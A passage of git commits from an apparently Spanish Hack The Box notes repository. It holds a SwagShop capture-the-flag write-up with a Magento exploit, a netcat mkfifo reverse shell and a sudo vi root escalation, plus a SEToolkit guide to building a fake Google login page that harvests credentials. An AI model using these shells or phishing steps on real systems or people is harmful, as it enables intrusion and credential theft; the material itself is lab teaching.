+Vemos como nos reporta dos usuarios, `forme` que es el usuario que creamos nosotros a traves del script de python3 y `haris` el cual nos indica una password hasheada. Yo he intentado descifrar el hash de varias maneras y no he conseguido extraer la contraseña.
+
+Al no poder econtrar la password decidi buscar vulnerabilidades ya reportadas de nuestro sistema, que nos permita
+registrarnos como sudo.
+
+Lo primero es saber si tenemos algún tipo se privilegios:
+
+ sudo -l
+
+
+
+Vemos como nos permite ejecutar sin contraseña los siguientes
+
+
+Ahora buscaremos algún binario con el que poder aprovechar estos permisos y registrarnos como`root`. Para poder buscar estas vulnerabilidades por la red
+debemos conocer el sistema que estamos comprometiendo, para ello, podemos ver las especificaciones del sistema mediante el siguiente comando:
+
+ lsb_release -a
+
+
+Podemos ver que nos econtramos frente ana distribución Ubuntu Xenial versión 16.04. Tras buscar un poco por internet encuentro el siguiente binario
+que nos permite aprovechar los permisos anteriores y registranos como `root`.
+
+Aquí podeis ver la págian donde reportan el binario: [https://gtfobins.github.io/gtfobins/vi/](https://gtfobins.github.io/gtfobins/vi/)

+Para poder introducir el binario y utilizar los permisos que tenemos, debemos realizar lo siguiente:
+
+
+ sudo /usr/bin/vi /var/www/html/* -c ':!/bin/sh' /dev/null
+
+`sudo /usr/bin/vi /var/www/html/*` : Directorios donde tenemos los permisos.
+
+`-c ':!/bin/sh' /dev/null` : Binario para tratar de registranos como `root`.
+Genial, ya estamos como `root`. Podemos comprobarlo mediante el comando `whoami`. Finalmente para encontrar nuestra flag, nos dirigimos al directorio
+`/root` donde encontramos el archivo `root.txt` con nuestra ultima flag.
From d225616c1e6e34600cdf3149dba1f377a70ba63f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 11:02:14 +0200
Subject: [PATCH 0211/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 24 +++++++++++++++++++-----
1 file changed, 19 insertions(+), 5 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index 5be322e95a7..d5fe08f9205 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -311,15 +311,20 @@ Lo primero es saber si tenemos algún tipo se privilegios:

-Vemos como nos permite ejecutar sin contraseña los siguientes
+Vemos como nos permite ejecutar como `root` sin contraseña los siguientes directorios: `/usr/bin/vi` y `/var/www/html/*`.
+
+ sudo /usr/bin/vi /var/www/html/*
+
+
Ahora buscaremos algún binario con el que poder aprovechar estos permisos y registrarnos como`root`. Para poder buscar estas vulnerabilidades por la red
debemos conocer el sistema que estamos comprometiendo, para ello, podemos ver las especificaciones del sistema mediante el siguiente comando:
lsb_release -a
-
+
+
Podemos ver que nos econtramos frente ana distribución Ubuntu Xenial versión 16.04. Tras buscar un poco por internet encuentro el siguiente binario
que nos permite aprovechar los permisos anteriores y registranos como `root`.
@@ -330,13 +335,22 @@ Aquí podeis ver la págian donde reportan el binario: [https://gtfobins.github.
Para poder introducir el binario y utilizar los permisos que tenemos, debemos realizar lo siguiente:
-
sudo /usr/bin/vi /var/www/html/* -c ':!/bin/sh' /dev/null
+
+
`sudo /usr/bin/vi /var/www/html/*` : Directorios donde tenemos los permisos.
`-c ':!/bin/sh' /dev/null` : Binario para tratar de registranos como `root`.
-Genial, ya estamos como `root`. Podemos comprobarlo mediante el comando `whoami`. Finalmente para encontrar nuestra flag, nos dirigimos al directorio
-`/root` donde encontramos el archivo `root.txt` con nuestra ultima flag.
+
+
+Genial, ya estamos como `root`. Podemos comprobarlo mediante el comando `whoami`. Finalmente para encontrar nuestra flag, nos dirigimos al directorio `/root` donde encontramos el archivo `root.txt` con nuestra ultima flag.
+
+
+
+
+
+
+
From c638597d6533601fe61a7df79b39d59cf9e6f684 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 11:05:54 +0200
Subject: [PATCH 0212/1701] Update index.md
---
index.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/index.md b/index.md
index 3d3fd490c15..08eb16e6671 100644
--- a/index.md
+++ b/index.md
@@ -1,5 +1,9 @@
# **Hack The Box**
+# Máquinas
+
+[HRB-SwagShop](./Maquinas-HTB/HTB-SwagShop.html)
+
## Starting Points
[HTB-Oopsie](./Starting Point/HTB-Oopsie.html)
@@ -26,6 +30,7 @@ Herramientas útiles para la fase de reconocimiento, como reportes de SO o recop
1.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
+3.[mkt](./Herramientas_y_Scripts/mkt.html)
## Shells:
Herramientas para crear shells inversas.
From 92f91430c52bc042f51ca20b21aa8b2f4dcc7af7 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 11:07:50 +0200
Subject: [PATCH 0213/1701] Update index.md
---
index.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/index.md b/index.md
index 08eb16e6671..2c27dc704b7 100644
--- a/index.md
+++ b/index.md
@@ -32,6 +32,7 @@ Herramientas útiles para la fase de reconocimiento, como reportes de SO o recop
2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
3.[mkt](./Herramientas_y_Scripts/mkt.html)
+
## Shells:
Herramientas para crear shells inversas.
From 44d9936ff761f3f0f161833d2ac429ce82e37a11 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 11:08:28 +0200
Subject: [PATCH 0214/1701] Update index.md
---
index.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 2c27dc704b7..e043854b59b 100644
--- a/index.md
+++ b/index.md
@@ -2,7 +2,7 @@
# Máquinas
-[HRB-SwagShop](./Maquinas-HTB/HTB-SwagShop.html)
+[HTB-SwagShop](./Maquinas-HTB/HTB-SwagShop.html)
## Starting Points
@@ -30,6 +30,7 @@ Herramientas útiles para la fase de reconocimiento, como reportes de SO o recop
1.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
+
3.[mkt](./Herramientas_y_Scripts/mkt.html)
From 36a6d2c6146bfce713bc22be1c56ed3ee3161910 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 11:10:07 +0200
Subject: [PATCH 0215/1701] Update index.md
---
index.md | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/index.md b/index.md
index e043854b59b..78a926716ee 100644
--- a/index.md
+++ b/index.md
@@ -29,11 +29,9 @@
Herramientas útiles para la fase de reconocimiento, como reportes de SO o recopilación de puertos.
1.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
-2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
-
+2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
3.[mkt](./Herramientas_y_Scripts/mkt.html)
-
## Shells:
Herramientas para crear shells inversas.
From 255e10ba8482799622da8ccb1ca63bde074d5696 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 11:22:51 +0200
Subject: [PATCH 0216/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 84 ++++++++++++++++++------------------
1 file changed, 42 insertions(+), 42 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index d5fe08f9205..c2512389955 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -3,11 +3,11 @@
# SwagShop
-En primer luegar nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
+En primer lugar, nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
sudo mkdir SwagShop
-Ahora mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que tengo previamente definida en la `zhshrc` crearemos nuestros directorio de trabajo:
+Ahora, mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que tengo previamente definida en la `.zhshrc` crearemos nuestros directorios de trabajo:
sudo mkt
@@ -18,7 +18,7 @@ realizar las máquinas de HTB.
### PING
-Realizamos un `ping` y vemos como nos reporta un ttl=63, por tanto ya sabemos que estamos frente una máquina Linux.
+Ejecutamos un `ping` y vemos como nos reporta un ttl=63, por tanto, ya sabemos que estamos frente una máquina Linux.
ping -c 1 10.10.10.140
@@ -30,13 +30,13 @@ Ahora vamos a ver mediante `whatweb` que más podemos ver:

-Vemos que es un sistema Linux Apache 2.4.18 en el cual corre un servicio `http` el cual esta basado en `Magento`.
+Vemos que es un sistema Linux Apache 2.4.18 en el cual corre un servicio `http` el cual está basado en `Magento`.
### ¿Qué es Magento?
-Es una plataforma de comercio en línea, de código abierto (open source) y escrita en PHP, con la que puedes realizar todo tipo de proyectos relacionados a la creación de páginas web de venta en Internet.
+Es una plataforma de comercio en línea, de código abierto (open source) y escrita en PHP, con la que puedes llevar a cabo todo tipo de proyectos relacionados con la creación de páginas web de venta en Internet.
-Es una herramienta para el diseño y desarrollo de tu tienda online, permitiéndote una gestión avanzada de distintas áreas, incluyendo el marketing y el posicionamiento web.
+Es una herramienta para el diseño y desarrollo de tu tienda online, permitiéndote una gestión avanzada de distintas áreas, incluyendo el marketing y el posicionamiento web.
### NMAP
@@ -50,7 +50,7 @@ Vemos como nos reporta el puerto 80 y el puerto 20.

-Intentamos ver el dominio `http://10.10.10.140/` y vemos como nos redirige hasta `swagshop.htb` pero no nos permite ver la página. Para ello vamos
+Intentamos ver el dominio `http://10.10.10.140/` y vemos como nos redirige hasta `swagshop.htb`, pero no nos permite ver la página. Para ello vamos
a registrar el dominio en nuestra carpeta `/etc/hosts` e introducimos la Ip de la máquina víctima y el host `swagshop.htb`:

@@ -69,7 +69,7 @@ Ahora volvemos a nuestro buscador y vemos como ya nos muestra la página.

-Pasamos a revisar la página. Como podemos ver la página es bastante funcional,se trata de una página de venta de productos de HTB, contiene varios enlaces y podemos ver como nos permite comprar y tratar de registranos
+Pasamos a revisar la página. Como podemos ver la página es bastante funcional, se trata de una página de venta de productos de HTB, contiene varios enlaces y podemos ver como nos permite comprar y tratar de registrarnos.
### Gobuster
@@ -79,7 +79,7 @@ En caso de no tener la herramienta la instalamos:
sudo apt install gobuster
-Para ello especificaremos el dominio de la víctima y el diccionario de rutas que vamos a utilizar. En este caso vamos a utilizar un diccionario llamado `directory-list-2.3-medium.txt` en cual es parte del repositorio `seclists`
+Para ello especificaremos el dominio de la víctima y el diccionario de rutas que vamos a utilizar. En este caso vamos a utilizar un diccionario llamado `directory-list-2.3-medium.txt` el cual es parte del repositorio `seclists`
Para descargar el repositorio:
@@ -89,20 +89,20 @@ Ya tenemos `gobuster` y el repositorio `seclists`, ahora procederemos con el esc
gobuster dir -u http://10.10.10.140 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
-`dir` : Se utiliza para especificar la opción de directorios.
+`dir` : Se usa para especificar la opción de directorios.
-`-u` : Se utiliza para especificar una `url`.
+`-u` : Se emplea para especificar una `url`.
-`-w` : Especifica el diccionario que vamos a utilizar.
+`-w` : Especifica el diccionario que vamos a usar.

-Podemos ver que nos reporta una serie de directorios. Tras revisarlos, veo que el directorio `app` contiene otros directorios.
+Podemos ver que nos reporta una serie de directorios. Tras comprobarlos, veo que el directorio `app` contiene otros directorios.

Esto podemos confirmarlo
-volviendo a pasar el `gobuster` e incluyendo el directio `app` en la url.
+volviendo a pasar el `gobuster` e incluyendo el directorio `app` en la url.

@@ -110,8 +110,8 @@ Vamos a tratar de acceder al directorio `app` desde el navegador.

-Tras ir revisando los directirios, encontramos que dentro de `etc/` en el
-archivo `local.xml` econtramos una credenciales.
+Tras ir verificando los directorios, encontramos que dentro de `etc/` en el
+archivo `local.xml` encontramos unas credenciales.

@@ -121,11 +121,11 @@ Vemos como nos reporta un username como `root` y una password:

-Guardaremos esta información en caso de que nos sea util más tarde. Ahora vamos a tratar de generar una reverse shell. Buscando reportes de vulnerabilidades sobre Magento, encuentro en github la siguiente herramienta
-escrita en python3, la cual nos permite crear una reverse shell en paginas creadas con Magento. Para ello la herramienta nos registra automaticamente con el nombre y contraseña que le proporcionemos. Por defecto nos define
+Guardaremos esta información en caso de que nos sea útil más tarde. Ahora vamos a tratar de generar una reverse shell. Buscando reportes de vulnerabilidades sobre Magento, encuentro en github la siguiente herramienta
+escrita en python3, la cual nos permite crear una reverse shell en páginas creadas con Magento. Para ello, la herramienta nos registra automáticamente con el nombre y contraseña que le proporcionemos. Por defecto nos define
`str` tanto como usuario como contraseña.
-Para descargar la herramienta en nuesto dierectorio actual:
+Para descargar la herramienta en nuestro directorio actual:
wget https://raw.githubusercontent.com/epi052/htb-scripts-for-retired-boxes/master/swagshop/magento-oneshot.py
@@ -143,16 +143,16 @@ Ya tenemos nuestra herramienta preparada, ahora solo debemos especificar el host
Vemos como funciona perfectamente y como nos reconoce como `www-data`.
-Desde aquí ya podriamos hacer cositas, reportando distintos comando podríamos
-ir interacuando con el sistema pero no es practico. Para poder trabajar bien
-vamos a tratar de montar una shell mñas cómoda.
+Desde aquí ya podríamos hacer cositas, reportando distintos comandos, podríamos
+ir interactuando con el sistema, pero no es práctico. Para poder trabajar bien
+vamos a tratar de montar una shell más cómoda.
-Para ello vamos a ver primero si disponemos de `netcat` para tratar de establer una reverse shell:
+Para ello vamos a ver primero si disponemos de `netcat` para tratar de establecer una reverse shell:
python3 magento-oneshot.py --command "wich nc" http://swagshop.htb/index.php
Vemos que si disponemos de netcat. Ahora vamos a tratar de establecer una
-reverse shell. En el siguiente enlace, podreis ver una gran repertorio
+reverse shell. En el siguiente enlace, podréis ver una gran repertorio
de herramientas desde las que establecer shells inversas.
Nosotros vamos a utilizar la de Netcat:
@@ -161,13 +161,13 @@ Nosotros vamos a utilizar la de Netcat:

-Pimero preparamos en una terminal a parte, con nuestro comando netcat `nc` en escucha por el puerto `8080`.
+Primero preparamos en una terminal aparte, con nuestro comando netcat `nc` en escucha por el puerto `8080`.
nc -lnvp 8080

-Finalmente especificamos el comando que nos reporta el artículo dentro de nuestro comando anterior, tambien especificamos nuestra Ip (En este caso es nuestra vpn de HTB) y el puerto desde el que nos pondremos en escucha, `8080`.
+Finalmente, especificamos el comando que nos reporta el artículo dentro de nuestro comando anterior, también especificamos nuestra Ip (En este caso es nuestra vpn de HTB) y el puerto desde el que nos pondremos en escucha, `8080`.
python3 magento-oneshot.py --command "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 8080 >/tmp/f" http://swagshop.htb/index.php
@@ -200,13 +200,13 @@ Y terminamos reseteando la shell:

-Ahora ya tenemos una shell más estable y potente. Tambien podemos cerrar la terminal de escucha por `nc` ya que esta
+Ahora ya tenemos una shell más estable y potente. También podemos cerrar la terminal de escucha por `nc`, ya que esta
shell es independiente y no se nos caerá.
-Como vemos la shell nos permite utilizar `Cntrl + c` sin expulsarnos pero aún no nos permite utilizar `Cntrl + l` para
+Como vemos la shell nos permite utilizar `Cntrl + c` sin expulsarnos, pero aún no nos permite utilizar `Cntrl + l` para
limpiar la shell y si utilizamos un `nano`, vemos como tampoco aprovecha todo el monitor.
-Aún que con esta shell ya se podría realizar las tareas restantes perfectamente, voy a mostrar como solucionar estos dos pequeños inconvenientes y así tener la shell al 100% funcional.
+Aunque con esta shell ya se podría realizar las tareas restantes perfectamente, voy a mostrar como solucionar estos dos pequeños inconvenientes y así tener la shell al 100% funcional.
Para ello primero solucionaremos el problema del `Cntrl +l` de la siguiente manera, si realizamos un `echo $TERM` vemos que tiene el valor `dumb`
y nosotros queremos que igual que nuestra shell, valga `xterm`:
@@ -223,15 +223,15 @@ Vemos como nos reporta `dump`. Para cambiarlo introducimos el siguiente comando:

-Ahora ya podremos limpiar la pantalla mediante `Cntrl + l`. Bien, ya solo falta regular el ancho y la altura de nuesta
-shell, para ello primero debemos conocer que medidas tiene nuestro monitor para porder ajustarlo, para verlo, abrimos una terminal nueva desde nuestros directorio e intruducimos:
+Ahora ya podremos limpiar la pantalla mediante `Cntrl + l`. Bien, ya solo falta regular el ancho y la altura de nuestra
+shell, para ello primero debemos conocer que medidas tiene nuestro monitor para poder ajustarlo, para verlo, abrimos una terminal nueva desde nuestro directorio e introducimos:
stty size

-Copiamos los dos números. Ahora volvemos a la reverse shell y podemos ver mediante el mismo comando que las proporciones son mucho menores. Para ajustarlo ralizamos lo siguiente:
+Copiamos los dos números. Ahora volvemos a la reverse shell y podemos ver mediante el mismo comando que las proporciones son mucho menores. Para ajustarlo realizamos lo siguiente:
stty size
@@ -243,13 +243,13 @@ Copiamos los dos números. Ahora volvemos a la reverse shell y podemos ver media
### Búsqueda de la primera Flag
-Una vez tengamos todo ajustado, vamos a por las flags. Para conseguir la primera, simplemene nos dirigimos al directorio raiz `/`:
+Una vez tengamos todo ajustado, vamos a por las flags. Para conseguir la primera, simplemente nos dirigimos al directorio raíz `/`:
cd /

-Y vamos a la carpeta `/home/haris` donde econtraremos el primer archivo `user.txt` con la primera flag.
+Y vamos a la carpeta `/home/haris` donde encontraremos el primer archivo `user.txt` con la primera flag.

@@ -288,7 +288,7 @@ Y ahora visualizamos las tablas:

-Vemos como se nos reportan un monton, pero una de las más interesantes es `admin_user`. Para ver mas información:
+Vemos como se nos reportan un mentón, pero una de las más interesantes es `admin_user`. Para ver más información:
describe admin_user;
@@ -300,12 +300,12 @@ Vamos a ver que se nos reporta dentro de `username` y `password`:

-Vemos como nos reporta dos usuarios, `forme` que es el usuario que creamos nosotros a traves del script de python3 y `haris` el cual nos indica una password hasheada. Yo he intentado descifrar el hash de varias maneras y no he conseguido extraer la contraseña.
+Vemos como nos reporta dos usuarios, `forme` que es el usuario que creamos nosotros a través del script de python3 y `haris` el cual nos indica una password hasheada. Yo he intentado descifrar el hash de varias maneras y no he conseguido extraer la contraseña.
-Al no poder econtrar la password decidi buscar vulnerabilidades ya reportadas de nuestro sistema, que nos permita
+Al no poder encontrar la password decidí buscar vulnerabilidades ya reportadas de nuestro sistema, que nos permita
registrarnos como sudo.
-Lo primero es saber si tenemos algún tipo se privilegios:
+Lo primero es saber si tenemos algún tipo de privilegios:
sudo -l
@@ -326,10 +326,10 @@ debemos conocer el sistema que estamos comprometiendo, para ello, podemos ver la

-Podemos ver que nos econtramos frente ana distribución Ubuntu Xenial versión 16.04. Tras buscar un poco por internet encuentro el siguiente binario
-que nos permite aprovechar los permisos anteriores y registranos como `root`.
+Podemos ver que nos encontramos frente ana distribución Ubuntu Xenial versión 16.04. Tras buscar un poco por internet encuentro el siguiente binario
+que nos permite aprovechar los permisos anteriores y regístranos como `root`.
-Aquí podeis ver la págian donde reportan el binario: [https://gtfobins.github.io/gtfobins/vi/](https://gtfobins.github.io/gtfobins/vi/)
+Aquí podéis ver la página donde reportan el binario: [https://gtfobins.github.io/gtfobins/vi/](https://gtfobins.github.io/gtfobins/vi/)

@@ -345,7 +345,7 @@ Para poder introducir el binario y utilizar los permisos que tenemos, debemos re

-Genial, ya estamos como `root`. Podemos comprobarlo mediante el comando `whoami`. Finalmente para encontrar nuestra flag, nos dirigimos al directorio `/root` donde encontramos el archivo `root.txt` con nuestra ultima flag.
+Genial, ya estamos como `root`. Podemos comprobarlo mediante el comando `whoami`. Finalmente, para encontrar nuestra flag, nos dirigimos al directorio `/root` donde encontramos el archivo `root.txt` con nuestra última flag.

From 9b9df6c806ae4a2cb3f02f7c60f6b716dd6b9b28 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 6 May 2022 09:08:28 +0200
Subject: [PATCH 0217/1701] Create HTB-RouterSpace.md
---
Maquinas-HTB/HTB-RouterSpace.md | 1 +
1 file changed, 1 insertion(+)
create mode 100644 Maquinas-HTB/HTB-RouterSpace.md
diff --git a/Maquinas-HTB/HTB-RouterSpace.md b/Maquinas-HTB/HTB-RouterSpace.md
new file mode 100644
index 00000000000..15ab72f7fda
--- /dev/null
+++ b/Maquinas-HTB/HTB-RouterSpace.md
@@ -0,0 +1 @@
+# RouterSapace
From bc2efea7e4af0ab71ae1c4ab4100694c1ba4c796 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sat, 7 May 2022 11:22:57 +0200
Subject: [PATCH 0218/1701] Update index.md
---
index.md | 8 +++++++-
1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 78a926716ee..4756c2af332 100644
--- a/index.md
+++ b/index.md
@@ -38,7 +38,7 @@ Herramientas para crear shells inversas.
[php-reverse-shell.php](./Herramientas_y_Scripts/php-reverse-shell.html)
## Hash:
-Herramientas de reconocimiento y des encriptación de hash.
+Herramientas de reconocimiento y desencriptación de hash.
1.[John the Ripper](./Herramientas_y_Scripts/john_the_ripper.html)
2.[HashID](./Herramientas_y_Scripts/HashId.html)
@@ -52,6 +52,12 @@ para encontrar potenciales filtraciones de memoria.
[Wfuzz](./Herramientas_y_Scripts/Wfuzz.html)
+## Phishing:
+Phishing es un término informático que distingue a un conjunto de técnicas que persiguen el engaño a una víctima ganándose su confianza haciéndose
+pasar por una persona, empresa o servicio de confianza, para manipularla y hacer que realice acciones que no debería realiza.
+
+[Setoolkit](./Herramientas_y_Scripts/Setoolkit.html)
+
## WordPress:
Escaneo de vulnerabilidades en páginas WordPress.
From 1ae65ad416b44fc7c6db64a3d21a56609c6cf381 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sat, 7 May 2022 11:52:54 +0200
Subject: [PATCH 0219/1701] Create Setoolkit.md
---
Herramientas_y_Scripts/Setoolkit.md | 46 +++++++++++++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 Herramientas_y_Scripts/Setoolkit.md
diff --git a/Herramientas_y_Scripts/Setoolkit.md b/Herramientas_y_Scripts/Setoolkit.md
new file mode 100644
index 00000000000..56353ccb1e7
--- /dev/null
+++ b/Herramientas_y_Scripts/Setoolkit.md
@@ -0,0 +1,46 @@
+
+
+# Setoolkit
+
+## ¿Qué es Setoolkit?
+
+ Se trata de un kit de herramientas de ingeniería social (SET) creado por Devid Kennedy. El equipo de Devid mantiene muy activo su set de herramientas
+ de forma que siempre se agregan nuevas funciones y ataques. Más recientemente, también se agregaron varias herramientas de ingeniería no social a SET,
+ lo que la convierte en una herramienta de ataque muy sólida.
+
+## Instalación:
+
+Para instalar esta herramienta realizaremos lo siguiente, primero vamos a nuestro escritorio y creamos una carpeta llamada `SEToolkit`:
+
+ cd Desktop
+
+ mkdir SEToolkit
+
+ cd SEToolkit
+
+Ahora nos clonaremos el siguiente repositorio de GitHub en el directorio `SEToolkit`:
+
+ git clone https://github.com/trustedsec/social-engineer-toolkit setoolkit/
+
+Una vez clonado, entramos en el directorio `setoolkit`:
+
+ cd setoolkit
+
+Podemos ver mediante `ls` todos los archivos clonados. Ahora procederemos a la instalación de todos los
+requisitos necesarios para Setoolkit:
+
+ sudo pip3 install -r requirements.txt
+
+Y finalmente realizamos la intalación de la herramienta:
+
+ sudo python setup.py
+
+Con esto ya tendríamos instalada nuestra herramienta. Importante, si el usuario
+normal no os permite utilizarla es porque os faltan permisos de ejecución y por tanto
+tendreís que utilizar la herramienta como `root`.
+
+
+## Ejecución:
+
+ sudo setoolkit
+
From 2578dba8fd4759e2aab1400e0c15b8d7f1dd5194 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sat, 7 May 2022 13:10:53 +0200
Subject: [PATCH 0220/1701] Update Setoolkit.md
---
Herramientas_y_Scripts/Setoolkit.md | 121 +++++++++++++++++++++++++++-
1 file changed, 118 insertions(+), 3 deletions(-)
diff --git a/Herramientas_y_Scripts/Setoolkit.md b/Herramientas_y_Scripts/Setoolkit.md
index 56353ccb1e7..4e53b250e9d 100644
--- a/Herramientas_y_Scripts/Setoolkit.md
+++ b/Herramientas_y_Scripts/Setoolkit.md
@@ -1,46 +1,161 @@

+
# Setoolkit
+
## ¿Qué es Setoolkit?
+
Se trata de un kit de herramientas de ingeniería social (SET) creado por Devid Kennedy. El equipo de Devid mantiene muy activo su set de herramientas
de forma que siempre se agregan nuevas funciones y ataques. Más recientemente, también se agregaron varias herramientas de ingeniería no social a SET,
lo que la convierte en una herramienta de ataque muy sólida.
## Instalación:
+
Para instalar esta herramienta realizaremos lo siguiente, primero vamos a nuestro escritorio y creamos una carpeta llamada `SEToolkit`:
+
cd Desktop
mkdir SEToolkit
+
cd SEToolkit
Ahora nos clonaremos el siguiente repositorio de GitHub en el directorio `SEToolkit`:
+
git clone https://github.com/trustedsec/social-engineer-toolkit setoolkit/
Una vez clonado, entramos en el directorio `setoolkit`:
+
cd setoolkit
Podemos ver mediante `ls` todos los archivos clonados. Ahora procederemos a la instalación de todos los
requisitos necesarios para Setoolkit:
+
sudo pip3 install -r requirements.txt
-Y finalmente realizamos la intalación de la herramienta:
+Y finalmente realizamos la instalación de la herramienta:
+
sudo python setup.py
+
Con esto ya tendríamos instalada nuestra herramienta. Importante, si el usuario
-normal no os permite utilizarla es porque os faltan permisos de ejecución y por tanto
-tendreís que utilizar la herramienta como `root`.
+normal no os permite utilizarla es porque os faltan permisos de ejecución y, por tanto,
+tendréis que utilizar la herramienta como `root`.
## Ejecución:
+Para ejecutarlo y poder acceder a sus multiples herramientas, simplemente ejecutamos lo siguiente:
+
sudo setoolkit
+ 
+
+La interfaz de SET es muy intuitiva, simplemente tendremos que marcar los número del panel en función del tipo de ataque que
+queramos realizar, y tambien, proporciona mucha información mediante en cada uno de sus paneles de opciones guiandote durante todo
+el proceso.
+
+
+
+
+# Crear una página falsa para capturar credenciales:
+
+En este ejemplo, voy a mostrar como crear mediante la herramienta SEToolkit como crear una página falsa de autentificación de google, tambien
+es posible aplicarlo a infinidad de paginas de registro o de relleno de credenciales, pero para el ejemple utilizaremos una que viene
+predefinida en la herramienta.
+
+Utilizando estos metedos los civercriminales engañana a sus víctimas haciendose pasar por cualquier tipo de servicio o entidad y de esta
+forma robarles todos los datos posibles, desde nombres o usuarios, hasta cuentas bancarias, números de tarjetas de crédito, contraseñas, etc
+intedependientemente de la longitud o dificultad de la contraseña, ya que simplemente se reporta al atacante cuando se ingresa dicha información.
+
+En primer lugar vamos a comprender como se realiza el ataque:
+
+ 1. Primero crearemos mediante `Setoolkit` una página falsa de inició de sesión de google.
+ 2. Está página quedara registrada en nuestra `localhost`.
+ 3. Finalmente cuando se introduzcan las credenciales en la página, se nos reportaran en la terminal del programa.
+
+Esto es una ejemplo muy simple que voy a mostrar como prueba, se puede realizar este ataque de formas mucho más complejas y dificiles de detectar.
+Recalco que utilizar está herramienta con alguien que no te lo haya autorizado es completamente ilegal y que este artículo està escrito con la
+finalidad de mostrar como actuan los cibercriminales. Dicho esto vamos a ver el ejemplo.
+
+### Crear página de inicio de sesión de Google:
+
+Ejecutamos la herramienta y seguimos los siguientes pasos:
+
+ sudo setoolkit
+
+
+
+
+La herramienta que vamos a utilizar es la `Social-Engienering Attacks` que corresponde al número `1`. Tener en cuenta que los números pueden
+variar en función de la versión ya que periodicamente se incluyen herramientas y funciones. Introducimos `1` y pulsamos `Enter`:
+
+ 1
+
+
+
+Ahora vamos a seleccionar el metodo de ataque `Website Attack Vectors` que me corresponde con el número `2`:
+
+ 2
+
+
+
+Lo siguiente que le debemos de indicar, es el tipo de ataque web que vamos a utilizar, en este caso, que lo que queremos es robar sus credenciales,
+utilizaremos el modo `Credential Harvester Attack Method` que corresponde con el número `3`:
+
+ 3
+
+
+
+Ya lo tenemos casi, solo nos queda especificar que clase de página vamos a mostrar. Como veis tambien nos da la opción `2` que es la de clonar
+algún sitio web y así ajustarse más al tipo de víctima. En nuestro caso vamos a seleccionar la opción `1` que ya nos muestra algunas páginas web
+que la herramienta nos muestra de serie, aśi que seleccionaremos `Web Templates`:
+
+ 1
+
+
+
+Vemos como la misma herramienta nos muestra tres opciones predefinidas, `Java`, `Google` y `Twitter`. Vamos utilizar la de `Google` así que marcamos
+la `2`.
+
+
+
+En caso de preguntarnos si utilizamos NAT se lo indicamos y luego simplemente presionamos `enter` y veremos como el sistema se quedará a la escucha:
+
+
+
+La página ya esta completamente funcional, ahora simplemente nos dirigimos a un navegador, en mi caso firefox y para ejecutar la página escribimos
+`localhost` o `127.0.0.1` que es donde se aloja la página de forma predeterminada. Esto podemos cambiralo pero para este tutorial nos sobrará.
+Vamos al navegador y abrimos la página:
+
+
+
+
+
+
+
+
+
+
+Como vemos la página es muy realista, ahora simplemente escribimos unas credenciales (no tienen poque ser validas, el programa nos reportara todo
+lo que se escriba). Para que se vea que esto funciona independientemente de la dificultad de la contraseña, hemos introducido una password con
+variedad de caracteres.
+
+
+
+
+
+Y finalmente podemos ver como se nos reporta todo en la terminal desde la cual ejecutamos el ataque:
+
+
+
+
+
From 00d051cf8a245ef2e1805367a940809f2cae6614 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sat, 7 May 2022 13:17:24 +0200
Subject: [PATCH 0221/1701] Update Setoolkit.md
---
Herramientas_y_Scripts/Setoolkit.md | 48 ++++++++++++++---------------
1 file changed, 24 insertions(+), 24 deletions(-)
diff --git a/Herramientas_y_Scripts/Setoolkit.md b/Herramientas_y_Scripts/Setoolkit.md
index 4e53b250e9d..abbee3c7ce3 100644
--- a/Herramientas_y_Scripts/Setoolkit.md
